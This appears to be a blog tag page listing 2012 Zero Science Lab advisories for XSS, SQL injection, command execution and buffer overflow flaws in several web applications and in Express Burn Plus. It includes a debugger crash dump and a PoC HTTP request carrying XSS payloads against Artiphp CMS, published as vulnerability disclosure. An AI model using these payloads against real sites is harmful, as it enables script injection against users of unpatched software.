Posts Tagged ‘ remote

NASA Tri-Agency Climate Education (TrACE) Multiple Vulnerabilities

The Tri-Agency Climate Education (TrACE) Catalog provides search and browse access to a catalog of educational products and resources. TrACE focuses on climate education resources that have been developed by initiatives funded through NASA, NOAA, and NSF, comprising a tri-agency collaboration around climate education.

The application suffers from a reflected cross-site scripting vulnerability when input is passed to the ‘product_id’, ‘pi’, ‘project_id’ and ‘funder’ GET parameters in ‘trace_results.php’ script which is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site. The application also suffers from an SQL Injection vulnerabilities when input is passed to the ‘product_id’ and ‘grade’ GET parameters in ‘trace_results.php’ script which is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Advisories:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5112.php

ViArt Shop Multiple Vulnerabilities

ViArt Shop suffers from multiple stored cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site. Also, the software suffers from remote arbitrary command execution vulnerability when input passed to the ‘DATA’ POST parameter in ‘sips_response.php’ is not properly sanitised before being used to process product payment data. This can be exploited to execute arbitrary commands via specially crafted requests.

Advisories:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5108.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5109.php

Cannonbolt Portfolio Manager v1.0 Stored XSS and SQL Injection Vulnerabilities

The application suffers from a stored cross-site scripting and a SQL Injection vulnerability when input is passed to the ‘cname’ POST parameter in ‘add-category.php’ and ‘cdel’ GET parameter in ‘del.php’ script which is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code or execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5104.php

Express Burn Plus v4.58 EBP Project File Handling Buffer Overflow PoC

The vulnerability is caused due to a boundary error in the processing of a project file, which can be exploited to cause a unicode buffer overflow when a user opens e.g. a specially crafted .EBP file. Successful exploitation could allow execution of arbitrary code on the affected machine.

——————————————————————————–
(13d4.a84): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=050a8c70 ebx=004034fc ecx=00000041 edx=fc4d5390 esi=0157cf68 edi=001297fe
eip=004678ef esp=00126420 ebp=001274c0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x678ef:
004678ef 66890c02 mov word ptr [edx+eax],cx ds:0023:0157e000=????
0:000> d eax
050a8c70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8c80 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8c90 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8ca0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8cb0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8cc0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8cd0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
050a8ce0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:000> d esi
0157cf68 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cf78 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cf88 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cf98 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cfa8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cfb8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cfc8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0157cfd8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.

———————————————————————————-

Advisory ID: ZSL-2012-5103
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5103.php

Multiple vulnerabilities in multiple web applications

ZSL-2012-5097SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability
ZSL-2012-5098web@all CMS 2.0 Multiple Remote XSS Vulnerabilities
ZSL-2012-5099web@all CMS 2.0 (_order) SQL Injection Vulnerability
ZSL-2012-5100KindEditor 4.1.2 (name parameter) Reflected XSS Vulnerability
ZSL-2012-5101Monstra 1.2.1 Multiple HTML Injection Vulnerabilities
ZSL-2012-5102xt:Commerce v4.0.15 (products_name_de) Script Insertion Vulnerability

The applications suffer from multiple stored and reflected XSS vulnerabilities including an SQL Injection.

Zoho BugTracker Multiple Stored XSS Vulnerabilities

The Bug Tracking Software suffers from a stored XSS vulnerability when parsing user input to the ‘comment’ and ‘mystatus’ parameters via POST method thru ‘bugdetails.do’ and ‘addmystatus.do’ scripts. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Zoho Bug Tracker

Advisory ID: ZSL-2012-5096
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5096.php

PolarisCMS (blog.aspx) Remote URI Based Cross-Site Scripting Vulnerability

PolarisCMS suffers from a XSS issue when input passed to the function ‘WebForm_OnSubmit()’ via the URL to blog.aspx is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5095.php

PyroCMS 2.1.1 CRLF Injection And Stored XSS Vulnerability

PyroCMS suffers from a stored XSS and HTTP Response Splitting vulnerability when parsing user input to the ‘title’ and ‘redirect_to’ parameters via POST method thru ‘index.php’ script. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session or insert arbitrary HTTP headers, which are included in a response sent to the user.

 

 

 

 

Advisory ID: ZSL-2012-5092
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5092.php

 

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5090
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php

PoC:

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post "onmouseover=prompt(1) joxy
adresse_destinataire
adresse_expediteur lab%40zeroscience.mk
asciiart_post "onmouseover=prompt(2) joxy
expediteur "onmouseover=prompt(3) joxy
message Hello%20World
message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send Send
titre_sav "onmouseover=prompt(4) joxy
url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920 2

phpThumb() v1.7.11 (dir & title) Cross-Site Scripting Vulnerability

phpThumb is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the ‘dir’ and the ‘title’ parameter of the ‘phpThumb.demo.random.php’ and ‘phpThumb.demo.showpic.php’ scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5088
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5088.php